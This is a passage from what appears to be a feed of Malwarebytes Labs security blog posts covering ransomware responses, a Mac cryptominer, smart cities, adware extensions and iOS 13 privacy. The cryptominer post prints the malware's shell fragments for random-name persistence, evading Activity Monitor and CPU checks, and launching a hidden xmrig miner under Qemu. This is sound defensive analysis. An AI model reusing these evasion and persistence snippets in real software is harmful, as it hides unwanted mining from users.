The Chernobyl plant, today covered in a 350-foot-high, 840-foot-wide metal-and-concrete sarcophagus, stands as a sober monument to the importance of prioritizing community security and safety.

For all of the damage the Chernobyl disaster wrought, it is rife with warning signs that anybody can go see for themselves of what can happen when politics or profits trumps safety protocol: the abandoned buildings of the former Chernobyl employee village of Pripyat; the exposure of a once-hidden missile-detecting radar array (view our photos of the Duga array above); and hundreds of sadly untouchable stray dogs.

In the years that followed the Chernobyl disaster, the NRC decided over a series of at least three reports that there were few safety improvements, if any, for the United States to make at its reactors. After participating in a select scientific panel analyzing what happened, the Nobel laureate and American physicist Hans Bethe told Richard Rhodes for his book on Chernobyl, “the Chernobyl disaster tells us about the deficiencies of the Soviet political and administrative system rather than about problems with nuclear power.”

Weiss remains concerned about the security of nuclear plants in the United States and abroad because the stakes are so high.

“This isn’t a data breach,” he argues. “This is blowing things up.”

The post Chernobyl’s lessons for critical-infrastructure cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Radiohead’s ransom response shows novel approach for ransomware victims

Malwarebytes - Thu, 06/20/2019 - 17:20

Last week, British rock band Radiohead thwarted an attempted digital ransom, in which unnamed hackers stole roughly 18 hours of unreleased music dating back to the band’s recording of its studio album OK, Computer, revealing some less-than-ok computer security (sorry).

Instead of paying a ransom to keep the music secret, Radiohead released the files themselves, giving listeners a chance to stream the content for free, or download it for £18. All proceeds will go to the organized political group Extinction Rebellion, which fights to address climate change.

As digital ransoms and straightforward ransomware attacks continue to plague companies, organizations, and entire cities, a handful of victims, like Radiohead, are taking novel approaches, often refusing to pay.

But these approaches work for few victims, said Bill Siegel, co-founder of CoveWare, which helps ransomware victims rebuild their databases and negotiate with ransomware hackers if necessary.

“I think what Radiohead did was an amazing thing, but the content they had was for public consumption to begin with, unlike a private company’s data, which is never for public consumption,” Siegel said. “You have to draw that distinction. Every case is unique.”

For everyone who isn’t Radiohead, fret not, as there are several other creative solutions when recovering from a ransomware attack.

Ransoms, ransomware, and responses

Ransomware attacks continue to threaten and destabilize small and large businesses, and, according to recent data from CoveWare, the actual ransom amounts demanded are increasing dramatically. In the first quarter of 2019, CoveWare found that ransom amount demands increased 90 percent, with the average amount demanded after a Ryuk ransomware attack hitting $286,556. The average ransomware attack downtime is 7.3 days, and the average cost of that downtime is $64,645.

For Radiohead, the band was told to pay $150,000 or risk having the 18 hours of stolen music released online. On June 11, Radiohead guitarist Jonny Greenwood announced the ransom attempt on Facebook, along with the band’s subsequent ransom refusal. To read his words, the whole affair seemed tedious.

“[I]nstead of complaining—much—or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion,” wrote Greenwood. “Just for the next 18 days. So for £18 you can find out if we should have paid that ransom.”

The band’s description of the recorded material is even more mundane:

“it’s not v interesting
there’s a lot of it.”

(The Guardian gave it four out of five stars.)

Less than one week after Greenwood’s announcement, another potential digital ransom victim refused to back down.

On June 15, actress Bella Thorne told her followers on Twitter that, after a hacker attempted to blackmail her with stolen nude photos, she was going to post those photos herself.

“I’m putting this out because it’s my decision. Now you don’t get to take yet another thing from me,” Thorne wrote in a note posted on Twitter. “I can sleep better knowing I took my power back. You can’t control my life, you never will.”

Thorne’s response echoed another blackmail attempt that was shut down earlier this year by Amazon CEO Jeff Bezos. Following the National Enquirer’s exposé into Bezos’ affair with a television anchor, which revealed several surreptitiously-obtained private messages, Bezos hired a private investigator to look into how his private texts were leaked to the supermarket tabloid. Weeks into the investigation, Bezos said he was offered a proposition by the paper’s owner: Stop his investigation or suffer the publishing of more intimate details, including one “below-the-belt selfie.”

Bezos did not buckle. Instead, he wrote on Medium about his back-and-forth with the National Enquirer’s owner, AMI.

“Of course I don’t want personal photos published, but I also won’t participate in [AMI’s] well-known practice of blackmail, political favors, political attacks, and corruption,” Bezos wrote. “I prefer to stand up, roll this log over, and see what crawls out.”

Bezos, Thorne, and Radiohead all responded the same way—they flipped the situation, turning themselves from victims into champions.

“I don’t love @JeffBezos in general, but I LOVE Jeff Bezos in particular here,” wrote Silicon Valley journalist Kara Swisher on Twitter.

“Bella Thorne steals hackers thunder,” wrote one cybersecurity blog.

“Radiohead Just Took On Ransom Hackers—And Won,” read the headline for Forbes.

Siegel said Radiohead’s response “defused” the situation.

“That’s an important word when it comes to public ransomware incidents,” Siegel said. “It is the ability to control the narrative and defuse it. It makes a big difference in the perception of how it was handled.”

But when it comes to how organizations have responded to actual ransomware—which is not the same as the above examples—the publicized results have been less empowering.

Ransomware attacks are unlike the threat made against Radiohead, making the responses to them potentially more complicated. Ransomware authors often target a large organization, deploying malware that encrypts all the files stored on a machine, leaving them indecipherable and completely useless unless decrypted.

Ransomware attackers then give victims a choice: Pay up and get the decryption key, or, lose access to all your files forever.

Recently, one ransomware victim chose the latter.

In April, a two-surgeon medical practice in Michigan shut down early—about one year before the doctors’ planned retirement—after getting hit with a string of ransomware that locked all patient files behind a guarded decryption key. Medical records, bills, and patient appointments were all inaccessible after the attack.

The two doctors decided against paying the demanded $6,500 ransom, because, according to an interview with the Star Tribune, there was no guarantee the decryption key would work or that the ransomware wouldn’t be deployed against them again.

The lost appointment calendar led to one of the doctors staying in the office simply to cover all the upcoming—but unviewable—appointments.

“We didn’t even know who had an appointment in order to cancel them,” one of the surgeons told the Star Tribune. “So what I did was just sort of sat in the office and saw whoever showed up. For the next couple of weeks.”

This outcome, Siegel said, is not desired.

“It’s not super responsible,” Siegel said. “There are still patients who want their records, and they can’t get them anymore.”

Another ransomware victim that failed to appropriately respond is the City of Baltimore.

In early May, threat actors deployed the ransomware RobbinHood against 10,000 computers used by the City of Baltimore, locking city services into digital gridlock. As of June 5, only one third of the city’s employees had received new logins, and the process to obtain new credentials required in-person visits. Some email and phone services had been restored, city officials said, but much of the city’s payment processes were still relegated to manual efforts. Residents’ water bills would be higher in the future, said one official, because the smart meters could not accurately capture water usage for the past month. Parking tickets needed to be paid in person, with the physical ticket in hand.

All accounted, the cost of the ransomware attack would hit $18 million, with $10 million devoted to cleanup and $8 million lost from downtime. The original ransom amount demanded was 13 Bitcoin, or about $116,000 today.

“If you look at Baltimore, it’s a case study of what not to do, across the board,” Siegel said. “If you don’t have a plan, and you make that very obvious, in public, you’re just thrashing around.”

Turning panic into progress

Two weeks ago, we gave users a rundown on how to prepare for a ransomware attack on their systems. While useful, the guide focuses on preparation—after all, the best way to protect against ransomware is to prevent it from happening in the first place.

But what about the company that has already been hit with a ransomware attack? What about a mid-sized business that doesn’t have the resources of the world’s richest man (Bezos), the popularity of the band that made the often-named most influential record of the current millennium (Radiohead), or the courage to post revealing information about themselves, detractors be damned (Thorne)?

What options are left for businesses that can’t shut down overnight, can’t afford to spend $18 million on recovery, and still refuse to pay a ransom?

There are many options, Siegel said. Further, these options are just as ingenuous as every example listed, just maybe not as flashy.

“It’s not as fun a story, but the practical reality of recovery in lieu of paying involves a lot of creativity,” Siegel said. He said that, for CoveWare’s many clients, if there is ransom on the table to pay, “our stance is, it’s always the last resort.”

Immediately after a ransomware attack, Siegel said that company employees have three priorities in maintaining their business and limiting downtime: access to email, access to the Internet, and access to a file server to save and share their work.

As a business ensures that its employees can actually work in the following days, it can also start by rebuilding the data that is currently locked by a ransomware attack. There are many methods, and most of them aren’t high-tech. Instead, they’re clever, Siegel said.

“We’ve seen before that everybody gets their laptops, we’re talking 65 laptops in a room, and we start copying emails off of everybody’s Outlook accounts, literally to start rebuilding,” Siegel said. He said he has also seen employees going through all their email inboxes and outboxes and copying attached documents that were sent and received.

“It’s amazing where you can find copies of data,” Siegel said.

While the rebuilding process is happening, companies can also discuss the actual cost of paying a ransom or getting help to rebuild internal databases. For example, Siegel said, if a company has lost its QuickBook files through a ransomware attack, it can determine whether it makes more sense to spend, say $10,000 to $20,000 hiring local contractors to rebuild a database of invoices and accounts payable, rather than paying $100,000 for a ransom. Plus, Siegel said, a rebuilt database is a guarantee, whereas a paid ransom is not—according to CoveWare data, 96 percent of paid ransoms are honored.

The decision to pay off a ransom isn’t just economical, Siegel said. It’s also moral.

Siegel mentioned a client he spoke to who was hit with ransomware. The client’s insurance policy was going to cover the recovery cost (which is not always a guarantee), but the client was considering hiring contractors and local vendors to help rebuild his company’s database rather than paying the ransom. The cost to rebuild, Siegel said, would be about $300,000 to $400,000 for the client.

“The client said ‘Granted, it might take a month [to rebuild], versus paying [the ransom], which takes a day, but I’m going to put that money back into the local economy, hiring contractors and vendors, rather than shipping it over to criminals,’” Siegel said.

Paying a ransom is a last resort for many ransomware victims. But that doesn’t mean victims have to be completely undone by an attack. Instead, they can turn the tables, rebuilding from scratch, or doing their part to keep money out of criminals’ hands. Or, in the extremely unique case of Radiohead’s digital ransom, creating a revenue stream that never would have existed, and delivering that money straight to a social cause.

Perhaps the band was prophetic in 16 years ago naming its sixth studio album: Hail to the Thief. But in the case of businesses and celebrities who refuse to pay the ransom, it’s more like Fail to the Thief.

The post Radiohead’s ransom response shows novel approach for ransomware victims appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer Malwarebytes detects as Bird Miner runs by emulating Linux

Malwarebytes - Thu, 06/20/2019 - 15:33

A new Mac cryptocurrency miner Malwarebytes detects as Bird Miner has been found in a cracked installer for the high-end music production software Ableton Live. The software is used as an instrument for live performances by DJs, as well as a tool for composing, recording, mixing, and mastering. And while cryptomining is not new on Mac, this one has a unique twist: It runs via Linux emulation.

Miner behavior

The Ableton Live 10 cracked installer can be downloaded from a piracy website called VST Crack, and it’s more than 2.6 GB; a size that might be cause for alarm on other programs, but reasonable for such an app. However, on closer inspection, it’s clear this installer is doing some strange things. For example, Bird Miner’s postinstall script will, among other things, copy some installed files to new locations with randomized names:

#RANDOM z1="$( /Users/Shared/randwd Software )" z11="$( /Users/Shared/randwd )" z111="$( /Users/Shared/randwd )" z1111="$( /Users/Shared/randwd )" z2="$( /Users/Shared/randwd Software )" z22="$( /Users/Shared/randwd )" z222="$( /Users/Shared/randwd )" z2222="$( /Users/Shared/randwd )" z3="$( /Users/Shared/randwd )" z33="$( /Users/Shared/randwd )" z3333="$( /Users/Shared/randwd )" #CREATE DIRECTORIES mkdir /Library/Application\ Support/$z1 mkdir /Library/Application\ Support/$z2 #Move Programs cp /Users/Shared/z1 /usr/local/bin/$z1 cp /Users/Shared/z1.daemon /Library/Application\ Support/$z1/$z11 cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z1/$z111 cp /Users/Shared/z1 /usr/local/bin/$z2 cp /Users/Shared/z1.daemon /Library/Application\ Support/$z2/$z22 cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z2/$z222

This code uses a randwd script, placed during the install process, to generate random names from a wordlist:

WORDLIST='/usr/share/dict/web2' TMP_FILE=$(mktemp -t wordlist) [...] # Allows user to pass initial charater to generator grep -E '^[[:upper:]]' ${WORDLIST} | grep -Ev 'Nazism|Nazi|Hitlerism' > ${TMP_FILE} WORDLIST=${TMP_FILE} # Use jot to generate random number for line of file to extract sed -n $(jot -r 1 1 $(wc -l < ${WORDLIST}))p ${WORDLIST}

Amusingly, the malware seems to want to avoid any mention of Nazis or Hitler—words that actually can be found in the wordlist. I guess even malware creators don’t want to be associated with the terms. Whoever wrote the filter didn’t really understand what the regular expression would match, though, as it’s longer than it needs to be.

The files that get dropped on the system, with random names, have a variety of functions. Three are launch daemons, charged with launching three different shell scripts.

One of the scripts launched is called Crax, and it installs in the /usr/local/bin/ directory. Crax is tasked with ensuring that the malware isn’t being snooped on by pesky security researchers. The first thing it does is check to see if Activity Monitor is running and, if it is, unload the other processes.

pgrep "Activity Monitor" if [ $? -eq 0 ]; then launchctl unload -w /Library/LaunchDaemons/com.Flagellariaceae.plist launchctl unload -w /Library/LaunchDaemons/com.Dail.plist else

If Activity Monitor isn’t running, the malware then goes through a series of CPU usage checks. If the results show that it’s pegging the CPU at more than 85 percent, it again unloads everything.

A=`ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'` B=`echo $A / 1 |bc` if [ $B -lt 120 ]; then T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'` C=`sysctl hw.logicalcpu |awk '{print $2 }'` D=`echo $T / $C |bc` if [ $D -gt 85 ]; then T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'` C=`sysctl hw.logicalcpu |awk '{print $2 }'` D=`echo $T / $C |bc` if [ $D -gt 85 ]; then T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'` C=`sysctl hw.logicalcpu |awk '{print $2 }'` D=`echo $T / $C |bc` if [ $D -gt 85 ]; then launchctl unload -w /Library/LaunchDaemons/com.Flagellariaceae.plist launchctl unload -w /Library/LaunchDaemons/com.Dail.plist fi fi fi else

If all these checks pass, it loads the daemons for the other two processes. In our case, these are com.Flagellariaceae.plist, which runs a script named Pecora, and com.Dail.plist, which runs a script named Krugerite.

Interestingly, these two scripts are nearly identical, and each loads a separate executable, as shown below for the Krugerite script.

#!/bin/bash function start { pgrep "Activity Monitor" if [ $? -eq 0 ]; then launchctl unload -w /Library/LaunchDaemons/com.Dail.plist else /usr/local/bin/Nigel -M accel=hvf --cpu host /Library/Application\ Support/Nigel/Poaceae -display none fi } start;

This script once again checks for Activity Monitor and bails out if it’s running, indicating that someone is watching for unusual processor activity. If it’s not open, then it launches an executable named Nigel, and passes a path to another file, Poaceae, as a parameter.

This is where things get interesting. It turns out that the Nigel file (and the corresponding file for the other script) is an old version of a piece of open-source software named Qemu.

Qemu is an open-source emulator, somewhat like a command-line-only VirtualBox, that is capable of running Linux executables on non-Linux systems. These copies of Qemu are being used to run the contents of image files, named Poaceae in the above example, using Apple’s Hypervisor framework for better performance.

The final piece of the puzzle lies inside the Poaceae file. This file is a QEMU QCOW image file:

test$ file /Users/test/Library/Application\ Support/Nigel/Poaceae /Users/test/Library/Application Support/Nigel/Poaceae: QEMU QCOW Image (v3), 527400960 bytes

This is a file format somewhat similar to Apple’s disk image (.dmg) format, but specific to Qemu, and not as easy to open. With some work, however, it is possible to peek inside the Poaceae file. In this case, the image contains a bootable Linux system. The specific variant of Linux that it uses is Tiny Core.

Image captured by opening the Poaceae file with Qemu, using different command-line parameters

The image also contains a mydata.tgz file, referenced in the screenshot above, which is used to load certain files at startup. One of those files is /opt/bootlocal.sh, which contains commands to run when the Tiny Core system starts up. In this case, that bootlocal.sh file contains commands to get xmrig up and running.

#!/bin/sh # put other system startup commands here /mnt/sda1/tools/bin/idgenerator 2>&1 > /dev/null /mnt/sda1/tools/bin/xmrig_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ccommand_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ccommand 2>&1 > /dev/null /mnt/sda1/tools/bin/xmrig

Thus, as soon as the Tiny Core system boots up, xmrig launches without ever needing a user to log in. As soon as the system shown in the screenshot above asks for the “box login,” the miner is already running.

The xmrig software has been abused multiple times recently by Mac cryptominers, such as DarthMiner. However, Bird Miner is an interesting case, as the copy of xmrig being used here is a Linux executable run in emulation via Qemu.

Distribution

The malware was first spotted in a pirated Ableton Live 10 installer. Since then, we’ve found additional installers for Bird Miner, all distributed through the same site for other software. All such installers will drop the same malware, though the exact install process may vary slightly.

However, a Reddit thread on piracy discussing the safety of the VST Crack site revealed that this site has been distributing this malware in some form for at least four months, probably longer.

Sure enough, a couple older installers were found on VirusTotal that used the same technique, but did not yet use random file names.

Implications

Bird Miner malware is somewhat stealthy, as it will bail out at multiple points if Activity Monitor is running, and it effectively obfuscates the miner code by hiding it inside Qemu images.

However, it also shoots itself in the foot, stealth-wise, by using quite obvious launch daemons for persistence, and by using shell scripts to kick everything off. These things don’t reveal the intent of the malware, but it’s pretty easy for a savvy user to notice that something suspicious is going on.

More interesting is the fact that the malware runs via emulation, when it could easily have run as native code. This would have given the malware better performance and a smaller footprint. Further, the fact that the malware runs two separate miners, each running from their own 130 MB Qemu image file, means that the malware consumes far more resources than necessary.

The fact that Bird Miner was created this way likely indicates that the author probably is familiar with Linux, but is not particularly well-versed in macOS. Although this method does obfuscate the miner itself, which could help the malware evade detection, that benefit is countered by reliance on shell scripts and the heavy footprint of running not one but two miners simultaneously in emulation.

Obviously, this malware provides a solid example of why piracy is not a good idea. If you’re engaging in piracy, you’re likely to get infected, even with antivirus software installed. Like a railing on a bridge, antivirus software can protect you, but it’s much less effective if you’re actively jumping the rail and engaging in risky behavior.

Malwarebytes for Mac detects this malware as OSX.BirdMiner.

IOCs /usr/local/bin/Crax: 3dca4365b5ea280b966541d53eaee665e2b915a668dd34a1ae208595bc83dbda
/usr/local/bin/Nigel: 5c314b493d6ad5df84450e190b94a9ff67e79ca125a322a65b465ee171b6e638
/Library/Application Support/Nigel/Krugerite: 390e9a6d4a6f6c9a553aaa6543058931d14cfdc2620732bbfac73fd90eaf09ee
/Library/Application Support/Nigel/Poaceae: 7e36222a3e3898d9473f017c33c803ad70878fa79f391a65d87ae061cb89fba7
one of the smallest installers: dfbe4d61118aef6464a2fe17cbf882d4a0f3fdb81e58d99aa7114a553b42a66d

The post New Mac cryptominer Malwarebytes detects as Bird Miner runs by emulating Linux appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report: Malicious AI is coming—is the security world ready?

Malwarebytes - Wed, 06/19/2019 - 15:00

Imagine a world in which artificial intelligence has gone rogue—the robots have revolted against their masters and have now enslaved all of humanity. There’s no more natural beauty in the world and everything is awful.

Get that out of your system? Good.

The reality of malicious AI, at least in the near future, is far less dystopian. However, it is a reality, and it’ll be here sooner than people might think. As with all disruptive technology, after blissful early adoption soon follows abuse. And if cybercriminals know one thing, it’s how to profit off a trend.

Therefore Malwarebytes Labs’ latest report takes a pragmatic approach to evaluating the dangers of AI and machine learning (ML), looking at exactly how these technologies are being used today, their benefits, and our concerns for near-future abuse. Why? So that developers, security professionals, and other organizations can incorporate AI responsibly and guard against potential attacks.

Without further ado, we present:

When artificial intelligence goes awry: separating science fiction from fact

The post Labs report: Malicious AI is coming—is the security world ready? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Smart cities, difficult choices: privacy and security on the grid

Malwarebytes - Tue, 06/18/2019 - 17:17

All is not well in the land of smart city planning, as the latest major planned development from Google’s sister company Sidewalk Labs continues to run into problems in Toronto, Canada.

A groundswell of support?

Building a city “From the ground up” is apparently no longer a thing: at least some folk with a hand in digital urban design are saying it’s “From the Internet up” now. The plan was to take Toronto’s waterfront and transform it into an innovative smart city location. Sidewalk Labs got the contract to design a big chunk of Toronto’s waterfront in 2017, with potential for expansion.

New tech and an eye for environmentally-friendly design should have been the icing on the cake. Instead, continued delays over revealing what is happening is leading to complaints and protest groups like Block Sidewalk who aren’t happy with the direction things have taken.

A bump in the road

As it turns out, planning something like a smart city is incredibly complicated, and things appear to be slipping behind schedule. Worse, nobody seem to be able to tell the residents exactly what’s coming in this brave new world of digital connectedness. Google’s Sidewalk Labs want to try and set a “Global standard” for how user data should be treated, but there’s still no real information available as to how this will work in practice.

Interestingly, it’s the data privacy concerns now primarily coming to the fore, as bigger tech critics weigh in. It’s no fun when your project is on the receiving end of comments like, “A colonizing experiment in surveillance capitalism” or “…a dystopian vision that has no place in a democratic society,” especially if your main aim was to build some wood paneled houses and a functional drainage system.

Various resignations from the advisory panel and even the former privacy commissioner of Ontario, stating, “I imagined us creating a smart city of privacy as opposed to a smart city of surveillance” has definitely not helped to smooth out concerns.

The clear signifier is that early buy-in is crucial in getting one of these projects off the ground. Without an early affirmation of what to expect, people will dig their heels in and say no regardless of what’s on offer.

Puebla, in East-Central Mexico, is a good example of this. They have 15 locations slated to become smart cities. Santa Maria Tonantzintla has essentially refused to go any further after a lack of information as to what’s coming next. Demolishing some local landmarks certainly didn’t help matters. I would’ve linked to the 15 cities project, but the website is offline, which may or may not be very on brand for this kind of enterprise.

What is a smart city?

Good question, and one we may take for granted. Defining a smart city can be an exercise in frustration, but experts broadly peg them as one of two distinct flavours: top down, and bottom up.

Top down smart cities

These are major projects put together through a combination of governments, city councils, and major technology vendors. Ideally, an entire city is constructed from nothing, with the essential technology backbone required to make it all work in place from the outset.

Someone, somewhere sits Wizard-of-Oz style with a large control bank ensuring every aspect of day-to-day living works seamlessly—from trash collection and street lighting to traffic flow management and energy use.

That’s how it pans out in an ideal world with no need to worry about things going wrong, anyway. As you’ll see shortly, things tend to go wrong quite a bit. For now, let’s look at the next style of smart city.

Bottom up smart cities

This is what people who live in a city get up to when left to their own devices (pun probably not intended). Crowdfunders, crowdsourcing, smaller disruptive organisations working with communities to make things work more efficiently; it’s all here, and it’s as potentially chaotic as you’d imagine.

Piecing the puzzle together

Of course, it’s usually tricky to slap a city together from scratch and be home in time for supper—most of our towns and cities are already here with us. What we mostly have is a haphazard assemblage of council-led approaches bolted onto crumbling infrastructures while independent apps and community projects simultaneously do their own thing. The residents are by and large caught in the middle of this ebb and flow, and there’s never a real guarantee any of it is going to work as expected.

Smart city shenanigans

Despite their best efforts, projects can and do run into troublesome situations. Many of them aren’t even strictly security related; you’re probably more likely to fall victim to negligence or poor planning. Even so, the end result is still the same, whether or not someone hacked the Gibson, and a problem will still cause headaches. Below, we look at a few issues facing both top and bottom styles of smart city.

Top down smart city problems

1) In the UK, Westminster ran into issues when the company managing the city’s street lights went into administration. With nobody at the lightbulb wheel, residents were amazed to find some 8,000 street lights blasting away 24/7 for an entire week. The local council had to pay a “small fee” to the new company administrators to get things resolved.

While you’d think a contingency plan would be in place for contract explosion at this level, it somehow ended up being missed. Nobody wants to go to bed with typically much brighter smart bulbs pouring in through the window, not to mention the power drain/environmental impact. A simple but effective example of how sometimes top down gets it wrong.

2) What if an entire neighbourhood’s identity vanished from online maps to the extent that it’s data-driven invisibility meant you might never find it? That’s exactly what happened to the community of the Fruit Belt, aka “Medical Park,” courtesy of bad data not only from Town Hall but also a variety of mapping startups, tech orgs, and data brokers.

The residents’ fight to reclaim both the name and the location’s acknowledgement as a physical space is quite something. As with Westminster and their 24/7 lights, we see another situation where defunct companies leave unforeseen problems in their wake with nobody to play clean-up.

3) There’s also the threat from hacks in a top down system; control the hub, control the city. Exposed devices, default passwords, vulnerabilities, and critical flaws—all ready and waiting for someone to come along and take advantage. You expect a street light to break or a pipe to burst. What you don’t expect is people tampering with early warning systems or road signs displaying random messages.

4) Sticking with that same theme, a lot of work has been done in this area by the Securing Smart Cities project, which looks at ways companies, governments, media outlets, and more can work together to address these concerns. Amongst other things, they’ve done smart research on how CCTV systems can be a danger from something as banal sounding as not covering up labels. They’ve also explained how bad actors could scale up attacks to (for example) knock out air conditioners across multiple streets or an even bigger radius with the aid of some $50 equipment. That may not sound like a big deal, but in hot weather it could be potentially lethal for the sick or elderly.

5) Hong Kong residents protesting the proposed extraction law chose to avoid using their Metro cards for travel for fear of being tracked by the government. Instead, they opted for cash payments like tourists tend to do. This data has been used in the past for law enforcement, so one can understand their apprehension. In a place where even advertising has been used to name and shame litterbugs via DNA, this raises potent questions about where, exactly, power lies when so much of our day-to-day existence is at the whim of top down systems.

Bottom up smart city problems

1) Tracking in the age of smart tech is something people are naturally concerned about. When I looked at the hacking simulation NITE Team 4, I mentioned tracking someone’s phone via smart billboards. I was particularly taken by this appearing in a video game, because it’s a supposedly out-there concept that doesn’t sound real but (shocker) it is.

Wandering the streets, whizzing by in a car, walking around some shops? If your Wi-Fi is enabled, it’s quite possible you’re being tracked for marketing purposes.

2) What happens when your landlord and/or building complex decides the time has come for everybody to receive smart locks whether they want them or not? Chaos is what happens. Not everybody is a fan of taking control over basic functions like premises security away from the resident, and there’s multiple compelling reasons for not having them installed.

Case in point: What if there are potential security issues? What happens if the power goes down while there’s an apartment fire? What if the locks just stop working while you’re asleep? Who has access to the data? Before you know it, it’s all gone a bit legal and some people in suits are probably shouting a lot.

3) Of course, we can’t go on without the increasingly large mess that is IoT/smart home technology and domestic abuse cases. It’s a chilling example of what can go wrong with too many random technologies are mashed together in real-world settings with a malicious actor in the middle.

Quite often, there’s zero chance of the abused person being able to figure out where bad technology things are happening, and it can be a challenge for tech experts familiar with these issues to find a decent starting place for their investigation.

Sandcastles in the sea

We’re scratching the surface here, but there’s a lot to take in where constructing a smart city is concerned, whether government-led or people doing it themselves. There are also some huge success stories in smart city land—it’s not all disasters, broken street lamps, and roadsigns yelling about zombie outbreaks.

For example, Bristol in the UK springs to mind as a great example of how to retool a city in a way that makes sense. There’s still a long way to go before we have other smart cities to rival Bristol though, and that probably applies to the somewhat embattled Toronto waterfront project.

As these projects drag on, issues of data, privacy, and consent appear to be the places where the primary battle lines are drawn. Without some solid answers in place, generals may find themselves run out of town by a cheerfully tech-unenhanced community.

The post Smart cities, difficult choices: privacy and security on the grid appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware and PUPs families add push notifications as an attack vector

Malwarebytes - Thu, 06/13/2019 - 18:36

Some existing families of potentially unwanted programs and adware have added browser push notifications to their weapons arsenal. Offering themselves up as browser extensions on Chrome and Firefox, these threats pose as useful plugins then haggle users with notifications.

A family of search hijackers

The first I would like to discuss is a large family of Chrome extensions that were already active as search hijackers, but have now added a notifications service from a provider hailing from a domain blocked for fraud by Malwarebytes. What that means is you can now expect browser notifications inviting you to come gamble at an online casino or advertisements selling you get-rich schemes that use pictures of celebrities to gain your trust.

This family is detected under the PUP.Optional umbrella, meaning that Malwarebytes flags them for misconduct but recognizes they offer some kind of functionality and are upfront about the fact that they will change your search settings. The third part of Malwarebytes’ detection name usually refers to the name of the extension. So this one is called PUP.Optional.StreamAll.

The extensions in this family are search hijackers—they redirect users to Yahoo! search results when searching from the address bar. The websites behind all the extensions in this family are presented in three different styles that are completely interchangeable:

Version 1 is a basic design kindly guiding you through the steps of installing the Chrome extension.

Version 2 shows a circle that fills with color until it reaches 100 percent and then tells you it is ready to install the extension.

Version 3 is a bit more “in your face” and lets you know you really shouldn’t miss out on this extension. It does come in a few slightly different color schemes.

The three websites posted above all lead to StreamAll, the same Chrome extension that I have used as an example for this family. In fact, they all redirect to this extension in Chrome’s web store at some point:

A stunning lot of users, which never ceases to amaze me.

Another thing the members of this family have in common is a “thank you” screen after installing one of their extensions, already busy pushing promotional deals. This one has a blue background but can also be fully white.

Their offer to receive notifications is made as soon as you reach one of their sites:

These prompts have also been added to member sites of this family that didn’t promote push notifications earlier on.

If you accept this offer you can find the resulting permission in the Settings menu > click on Advanced > under Privacy and Security > select Site settings > select Notifications.

The number of extensions in this family is rather large, but here is a list of removal guides I created for the most active ones at the moment of writing:

By active I mean they are being heavily promoted by some of the popular ad-rotators. To achieve this, they are probably paying a pretty penny and you can be sure they want to make good on that—at your expense.

A Facebook spammer

The second threat family I want to discuss is into far more serious business. This family of Firefox extensions is detected by Malwarebytes as Trojan.FBSpammer.

These extensions can be found at sites that try to convince users they need a Flash player update.

Prompts and links everywhere. What to do first?

They also ask for permission to send you notifications and—just like StreamAll—they use a provider that is blocked by Malwarebytes for fraud. But in this case, annoying push notifications are the least of users’ worries. As our friends at BleepingComputer figured out, this extension checks users’ Facebook connection and, if the user is logged in, the extension will join some Facebook groups on their behalf and start spamming them.

The extension performs a check to see whether the user is connected to Facebook every two seconds. The extension adds users to some Facebook groups if they are logged in. Then it fetches a campaign and starts spamming those groups in the user’s name. Lesson learned

While browser push notifications can be annoying, they are easy to resolve, as I explained in detail in my blog Browser push notifications: a feature asking to be abused. But we have seen from the examples above that there are worse things.

Choose carefully which extensions you decide to install, as well as which programs you allow to send push notifications. The extensions in these cases are up to no good—especially the Trojan that will give your Facebook reputation a quick shove into the cellar. And if you have trouble determining which extensions are benign and which are taking advantage of users, you can always count on Malwarebytes to point you in the right direction.

Stay safe, everyone!

The post Adware and PUPs families add push notifications as an attack vector appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Apple iOS 13 will better protect user privacy, but more could be done

Malwarebytes - Wed, 06/12/2019 - 16:42

Last week, Apple introduced several new privacy features to its latest mobile operating system, iOS 13. The Internet, predictably, expressed doubt, questioning Apple’s oversized influence, its exclusive pricing model that puts privacy out of reach for anyone who can’t drop hundreds of dollars on a mobile phone, and its continued, near-dictatorial control of the App store, which can, at a moment’s notice, change the rules to exclude countless apps.

At Malwarebytes, we sought to answer something different: Do the new iOS features actually provide meaningful privacy protections?

The short answer from multiple digital rights and privacy advocates is: “Yes, but…”

For example: Yes, but Apple’s older phones should not be excluded from the updates. Also: Yes, but Apple’s competitors are not likely to follow. And more broadly: Yes, but Apple is giving users a convenient solution that does not address a core problem with online identity.

Finally: Yes, but Apple can go further.

Apple’s new single sign-on feature

At Apple’s WWDC19 conference in San Jose last week, Senior Vice President of Software Engineering Craig Federighi told audience members that the latest iOS would give Apple users two big privacy improvements: better protection when signing into third-party services and apps, and more options to restrict location tracking.

Apple’s Single Sign-On (SSO) option will allow users to sign into third-party platforms and apps by using their already-created Apple credentials. Called “Sign in with Apple,” Federighi described the feature not so much as a repeat of similar features provided by competitors Google and Facebook, but as a response.

Standing before a projected display of two separate blue rectangles, one reading “Sign in with Facebook,” the other “Sign in with Google,” Federighi told the audience, “We’ve all seen buttons like this.”

While convenient, Federighi said, these features can also compromise privacy, as “your personal information sometimes gets shared behind the scenes, and these logins can be used to track you.” Behind Federighi, the presentation revealed all the types of information that get shuffled around without a user’s full understanding: Full names, gender, email addresses, events attended, locations visited, hometown, social posts, and shared photos and videos.

Federighi said “Sign in with Apple” locks that data dispersal down.

“Sign in with Apple” lets Apple users log into third-party apps and services by using the Face ID or Touch ID credentials created on their device. The SSO feature also gives Apple users the option to provide third parties with “relay” email addresses—randomly-generated email addresses created by Apple that serve as forwarding addresses, giving users the option to keep private their personal email address while still receiving promotional deals from a company or service. Further, relay addresses will not be repeated, and Apple will generate a new relay for each new platform or app.

Apple iOS 13 gives users the option to both share and hide their email from third-party apps when utilizing the company’s single sign-on feature. Courtesy: Apple

